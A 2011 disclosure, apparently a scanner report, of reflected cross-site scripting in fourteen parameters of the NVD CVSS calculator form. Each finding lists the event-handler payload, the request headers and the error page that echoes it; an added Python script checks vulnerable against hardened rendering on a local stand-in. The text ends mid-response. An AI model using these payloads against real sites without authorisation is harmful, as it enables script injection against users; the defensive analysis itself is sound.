Summary:
On March 16, 2011, while using the NVD CVSS Calculator (http://nvd.nist.gov/cvss.cfm) to compute CVSS scores for the SmarterMail 8.0 and SmarterStats 6.0 exploits, it became apparent that the form was vulnerable to cross-site scripting (XSS). On testing, every field and parameter of the form turned out to be vulnerable.
We e-mailed the address of record but never received a reply. We nonetheless know the report was received, because of a side channel: the site went down and then came back with the form fixed. It would have been preferable to document the issue as a CVE. Publishing this "unforgivable" vulnerability further underscores our position that, as of Q1/2011, very few entities truly understand the execution risk of a web application.
The value of the AccessComplexityVar request parameter is copied into the HTML document as plain text between tags. The payload 90c1e<img%20src%3da%20onerror%3dalert(1)>cadc28868d1 was submitted in the AccessComplexityVar parameter. This input was echoed as 90c1e<img src=a onerror=alert(1)>cadc28868d1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. The five- and eleven-character hex strings on either side of the <img> tag are random markers inserted by the scanner so that the echo can be located in the response; they carry no meaning of their own. Note also where the echo occurs: in this and every following finding the response is an HTTP 500 whose ColdFusion "cannot be converted to a number" error message contains the submitted value, prefixed by a numeric constant (here 0.71), written into the page without HTML encoding. The sink is therefore the error page, and output encoding at that point is what closes the issue; validating the parameters on the normal code path alone would leave the error handler reflecting whatever it is given.
Request

POST /cvss.cfm?calculator&version=2 HTTP/1.1
Host: nvd.nist.gov
Proxy-Connection: keep-alive
Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C)
Cache-Control: max-age=0
Origin: http://nvd.nist.gov
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 365

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
X-Powered-By: ASP.NET
Date: Thu, 17 Mar 2011 01:40:11 GMT
Content-Length: 9446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana"> The value 0.7190c1e<img src=a onerror=alert(1)>cadc28868d1 cannot be converted to a number. </h1>
...[SNIP]...
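The Python script below is an added example; it is not part of the XSS.CX report and not NIST's code. It reproduces the scanner's check (random marker, event-handler payload, random marker; then look for the echo) across all fourteen parameters named on this page, and places the unencoded error-page rendering the responses show beside a hardened rendering that entity-encodes the value. The remote endpoint is replaced by a constructed stand-in modelled on the responses above (the numeric prefix glued onto the submitted value, the h1 error template); nothing here contacts nvd.nist.gov, and the 0.71 prefix and template text are taken from the first response only.

```python
import html
import re
import secrets

# The 14 form parameters this report shows reflecting input unencoded.
CVSS_PARAMS = [
    "AccessComplexityVar", "AccessVectorVar", "AuthenticationVar",
    "AvailImpactVar", "AvailabilityRequirementVar",
    "CollateralDamagePotentialVar", "ConfImpactVar",
    "ConfidentialityRequirementVar", "ExploitabilityVar", "IntegImpactVar",
    "IntegrityRequirementVar", "RemediationLevelVar", "ReportConfidenceVar",
    "TargetDistributionVar",
]

# Event-handler payload used throughout the report. The markers around it let
# the scanner find the echo even when the page adds text on either side.
PAYLOAD = "<img src=a onerror=alert(1)>"


def make_probe(pre=None, post=None):
    """Build marker + payload + marker; markers default to random hex like the report's."""
    pre = pre if pre is not None else secrets.token_hex(3)[:5]
    post = post if post is not None else secrets.token_hex(6)[:11]
    return pre + PAYLOAD + post


def classify_reflection(response_html, probe):
    """How did the server echo the probe?
    'raw'      - verbatim: the event handler is live (what every finding here shows)
    'encoded'  - only the entity-escaped form appears: output encoding is in place
    'filtered' - both markers present but the tag is gone: input was sanitised
    'absent'   - markers not reflected at all
    """
    if probe in response_html:
        return "raw"
    if html.escape(probe, quote=False) in response_html:
        return "encoded"
    pre, post = probe.split(PAYLOAD, 1)
    if re.search(re.escape(pre) + r".*?" + re.escape(post), response_html, re.S):
        return "filtered"
    return "absent"


# Error-page shape copied from the report's 500 responses.
ERROR_PAGE = ('<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana"> '
              'The value {value} cannot be converted to a number. </h1>')


def render_error_vulnerable(value):
    """What the report shows: the unconvertible string is interpolated as-is."""
    return ERROR_PAGE.format(value=value)


def render_error_fixed(value):
    """Hardened form: entity-encode untrusted text before placing it between tags."""
    return ERROR_PAGE.format(value=html.escape(value))


def fake_calculator(renderer, numeric_prefix="0.71"):
    """Constructed stand-in for the remote endpoint (assumption: not the real
    nvd.nist.gov logic). The responses show a numeric constant in front of the
    submitted value when conversion fails ("0.71" + probe), so that is mimicked."""
    def handle(param, value):
        return renderer(numeric_prefix + value)
    return handle


def scan(handle, params=CVSS_PARAMS, make=make_probe):
    """Probe every parameter once and classify how it comes back."""
    results = {}
    for name in params:
        probe = make()
        results[name] = classify_reflection(handle(name, probe), probe)
    return results


if __name__ == "__main__":
    for label, renderer in (("unpatched", render_error_vulnerable),
                            ("patched", render_error_fixed)):
        print(label, scan(fake_calculator(renderer)))
```

Against the unpatched renderer every parameter classifies as raw, matching the fourteen findings; against the hardened renderer every parameter classifies as encoded. Re-running the same probes against the real form after a fix is how the "Form fixed" observation in the summary would be confirmed directly rather than inferred from the outage, and a result of filtered or absent should be read as "reflection removed", not as proof that the error handler now encodes its output.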
The value of the AccessVectorVar request parameter is copied into the HTML document as plain text between tags. The payload 985c5<img%20src%3da%20onerror%3dalert(1)>95fcd52d0af was submitted in the AccessVectorVar parameter. This input was echoed as 985c5<img src=a onerror=alert(1)>95fcd52d0af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request

POST /cvss.cfm?calculator&version=2 HTTP/1.1
Host: nvd.nist.gov
Proxy-Connection: keep-alive
Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C)
Cache-Control: max-age=0
Origin: http://nvd.nist.gov
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 365

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
X-Powered-By: ASP.NET
Date: Thu, 17 Mar 2011 01:40:11 GMT
Content-Length: 9445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana"> The value 1.0985c5<img src=a onerror=alert(1)>95fcd52d0af cannot be converted to a number. </h1>
...[SNIP]...
The value of the AuthenticationVar request parameter is copied into the HTML document as plain text between tags. The payload 4a7c7<img%20src%3da%20onerror%3dalert(1)>c2a5bebf2e7 was submitted in the AuthenticationVar parameter. This input was echoed as 4a7c7<img src=a onerror=alert(1)>c2a5bebf2e7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request

POST /cvss.cfm?calculator&version=2 HTTP/1.1
Host: nvd.nist.gov
Proxy-Connection: keep-alive
Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C)
Cache-Control: max-age=0
Origin: http://nvd.nist.gov
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 365

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
X-Powered-By: ASP.NET
Date: Thu, 17 Mar 2011 01:40:12 GMT
Content-Length: 9447

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana"> The value 0.7044a7c7<img src=a onerror=alert(1)>c2a5bebf2e7 cannot be converted to a number. </h1>
...[SNIP]...
The value of the AvailImpactVar request parameter is copied into the HTML document as plain text between tags. The payload b9a42<img%20src%3da%20onerror%3dalert(1)>99a13d10808 was submitted in the AvailImpactVar parameter. This input was echoed as b9a42<img src=a onerror=alert(1)>99a13d10808 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request

POST /cvss.cfm?calculator&version=2 HTTP/1.1
Host: nvd.nist.gov
Proxy-Connection: keep-alive
Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C)
Cache-Control: max-age=0
Origin: http://nvd.nist.gov
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 365

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
X-Powered-By: ASP.NET
Date: Thu, 17 Mar 2011 01:40:14 GMT
Content-Length: 9442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana"> The value 0.660b9a42<img src=a onerror=alert(1)>99a13d10808 cannot be converted to a number. </h1>
...[SNIP]...
The value of the AvailabilityRequirementVar request parameter is copied into the HTML document as plain text between tags. The payload 6fe4f<img%20src%3da%20onerror%3dalert(1)>1e68c5fc824 was submitted in the AvailabilityRequirementVar parameter. This input was echoed as 6fe4f<img src=a onerror=alert(1)>1e68c5fc824 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request

POST /cvss.cfm?calculator&version=2 HTTP/1.1
Host: nvd.nist.gov
Proxy-Connection: keep-alive
Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C)
Cache-Control: max-age=0
Origin: http://nvd.nist.gov
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 365

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
X-Powered-By: ASP.NET
Date: Thu, 17 Mar 2011 01:40:16 GMT
Content-Length: 9564

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana"> The value -16fe4f<img src=a onerror=alert(1)>1e68c5fc824 cannot be converted to a number. </h1>
...[SNIP]...
The value of the CollateralDamagePotentialVar request parameter is copied into the HTML document as plain text between tags. The payload 22afc<img%20src%3da%20onerror%3dalert(1)>4b7e5cb61d9 was submitted in the CollateralDamagePotentialVar parameter. This input was echoed as 22afc<img src=a onerror=alert(1)>4b7e5cb61d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request

POST /cvss.cfm?calculator&version=2 HTTP/1.1
Host: nvd.nist.gov
Proxy-Connection: keep-alive
Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C)
Cache-Control: max-age=0
Origin: http://nvd.nist.gov
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 365

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
X-Powered-By: ASP.NET
Date: Thu, 17 Mar 2011 01:40:14 GMT
Content-Length: 9586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana"> The value -122afc<img src=a onerror=alert(1)>4b7e5cb61d9 cannot be converted to a number. </h1>
...[SNIP]...
The value of the ConfImpactVar request parameter is copied into the HTML document as plain text between tags. The payload 4ed35<img%20src%3da%20onerror%3dalert(1)>74427bc6818 was submitted in the ConfImpactVar parameter. This input was echoed as 4ed35<img src=a onerror=alert(1)>74427bc6818 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request

POST /cvss.cfm?calculator&version=2 HTTP/1.1
Host: nvd.nist.gov
Proxy-Connection: keep-alive
Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C)
Cache-Control: max-age=0
Origin: http://nvd.nist.gov
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 365

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
X-Powered-By: ASP.NET
Date: Thu, 17 Mar 2011 01:40:13 GMT
Content-Length: 9442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana"> The value 0.6604ed35<img src=a onerror=alert(1)>74427bc6818 cannot be converted to a number. </h1>
...[SNIP]...
The value of the ConfidentialityRequirementVar request parameter is copied into the HTML document as plain text between tags. The payload 6dd8d<img%20src%3da%20onerror%3dalert(1)>8035976d30a was submitted in the ConfidentialityRequirementVar parameter. This input was echoed as 6dd8d<img src=a onerror=alert(1)>8035976d30a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request

POST /cvss.cfm?calculator&version=2 HTTP/1.1
Host: nvd.nist.gov
Proxy-Connection: keep-alive
Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C)
Cache-Control: max-age=0
Origin: http://nvd.nist.gov
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 365

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
X-Powered-By: ASP.NET
Date: Thu, 17 Mar 2011 01:40:15 GMT
Content-Length: 9564

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana"> The value -16dd8d<img src=a onerror=alert(1)>8035976d30a cannot be converted to a number. </h1>
...[SNIP]...
The value of the ExploitabilityVar request parameter is copied into the HTML document as plain text between tags. The payload 249f3<img%20src%3da%20onerror%3dalert(1)>56ad8b2ec23 was submitted in the ExploitabilityVar parameter. This input was echoed as 249f3<img src=a onerror=alert(1)>56ad8b2ec23 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request

POST /cvss.cfm?calculator&version=2 HTTP/1.1
Host: nvd.nist.gov
Proxy-Connection: keep-alive
Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C)
Cache-Control: max-age=0
Origin: http://nvd.nist.gov
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 365

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
X-Powered-By: ASP.NET
Date: Thu, 17 Mar 2011 01:40:17 GMT
Content-Length: 9521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana"> The value -1249f3<img src=a onerror=alert(1)>56ad8b2ec23 cannot be converted to a number. </h1>
...[SNIP]...
The value of the IntegImpactVar request parameter is copied into the HTML document as plain text between tags. The payload 8720b<img%20src%3da%20onerror%3dalert(1)>ed0ce7f1cbb was submitted in the IntegImpactVar parameter. This input was echoed as 8720b<img src=a onerror=alert(1)>ed0ce7f1cbb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request

POST /cvss.cfm?calculator&version=2 HTTP/1.1
Host: nvd.nist.gov
Proxy-Connection: keep-alive
Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C)
Cache-Control: max-age=0
Origin: http://nvd.nist.gov
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 365

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
X-Powered-By: ASP.NET
Date: Thu, 17 Mar 2011 01:40:13 GMT
Content-Length: 9442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana"> The value 0.6608720b<img src=a onerror=alert(1)>ed0ce7f1cbb cannot be converted to a number. </h1>
...[SNIP]...
The value of the IntegrityRequirementVar request parameter is copied into the HTML document as plain text between tags. The payload 97b09<img%20src%3da%20onerror%3dalert(1)>c114a31754d was submitted in the IntegrityRequirementVar parameter. This input was echoed as 97b09<img src=a onerror=alert(1)>c114a31754d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request

POST /cvss.cfm?calculator&version=2 HTTP/1.1
Host: nvd.nist.gov
Proxy-Connection: keep-alive
Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C)
Cache-Control: max-age=0
Origin: http://nvd.nist.gov
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 365

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
X-Powered-By: ASP.NET
Date: Thu, 17 Mar 2011 01:40:16 GMT
Content-Length: 9564

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana"> The value -197b09<img src=a onerror=alert(1)>c114a31754d cannot be converted to a number. </h1>
...[SNIP]...
The value of the RemediationLevelVar request parameter is copied into the HTML document as plain text between tags. The payload 6d0c9<img%20src%3da%20onerror%3dalert(1)>19caa74cac7 was submitted in the RemediationLevelVar parameter. This input was echoed as 6d0c9<img src=a onerror=alert(1)>19caa74cac7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request

POST /cvss.cfm?calculator&version=2 HTTP/1.1
Host: nvd.nist.gov
Proxy-Connection: keep-alive
Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C)
Cache-Control: max-age=0
Origin: http://nvd.nist.gov
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 365

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
X-Powered-By: ASP.NET
Date: Thu, 17 Mar 2011 01:40:18 GMT
Content-Length: 9522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana"> The value -16d0c9<img src=a onerror=alert(1)>19caa74cac7 cannot be converted to a number. </h1>
...[SNIP]...
The value of the ReportConfidenceVar request parameter is copied into the HTML document as plain text between tags. The payload 41d28<img%20src%3da%20onerror%3dalert(1)>e183273590e was submitted in the ReportConfidenceVar parameter. This input was echoed as 41d28<img src=a onerror=alert(1)>e183273590e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request

POST /cvss.cfm?calculator&version=2 HTTP/1.1
Host: nvd.nist.gov
Proxy-Connection: keep-alive
Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C)
Cache-Control: max-age=0
Origin: http://nvd.nist.gov
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 365

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
X-Powered-By: ASP.NET
Date: Thu, 17 Mar 2011 01:40:18 GMT
Content-Length: 9522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana"> The value -141d28<img src=a onerror=alert(1)>e183273590e cannot be converted to a number. </h1>
...[SNIP]...
The value of the TargetDistributionVar request parameter is copied into the HTML document as plain text between tags. The payload 64e3c<img%20src%3da%20onerror%3dalert(1)>c220e7f3ec0 was submitted in the TargetDistributionVar parameter. This input was echoed as 64e3c<img src=a onerror=alert(1)>c220e7f3ec0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request

POST /cvss.cfm?calculator&version=2 HTTP/1.1
Host: nvd.nist.gov
Proxy-Connection: keep-alive
Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C)
Cache-Control: max-age=0
Origin: http://nvd.nist.gov
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 365

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
X-Powered-By: ASP.NET
Date: Thu, 17 Mar 2011 01:40:15 GMT
Content-Length: 9586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
